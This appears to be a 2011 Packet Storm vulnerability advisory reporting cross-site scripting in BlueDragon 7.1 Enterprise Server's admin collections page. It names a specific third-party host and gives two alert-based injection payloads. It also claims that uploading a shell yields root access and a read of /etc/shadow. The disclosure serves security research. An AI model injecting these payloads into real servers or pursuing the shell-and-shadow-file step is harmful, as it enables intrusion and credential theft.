BlueDragon 7.1 Cross Site Scripting

2011-09-01T00:00:00
ID PACKETSTORM:104698
Type packetstorm
Reporter SubhashDasyam
Modified 2011-09-01T00:00:00

Description

                                        
                                            `# Exploit Title: BlueDragon 7.1 Enterprise Server JX Multiple XSS Vulnerabilities  
# Google Dork:  
# Cost : 5999$  
# Date: 01/08/2011  
# Author: www.newatlanta.com/bluedragon/  
# Software Link: www.newatlanta.com/bluedragon/  
# Version: 7.1  
# Tested on: Windows 7 , Ubuntu 11  
# CVE :  
# Exploit Discovered : SubhashDasyam  
# Website : http://www.subhashdasyam.com  
  
http://scotspine.viviotech.net:8080/bluedragon/admin/collections.cfm  
In the Name of Collections Enter XSS String like   
  
<BODY ONLOAD=alert('XSS')>  
"><< <script>alert('XSS');</script>">  
  
Demo Screen Shot  
http://i54.tinypic.com/k2ec05.png  
  
This Enterprise Server Costs you 5999$ per license still there is no Security   
  
You Get Root Access to the Server if you Upload a Shell   
  
One can Access the Shadow File etc /etc/shadow  
`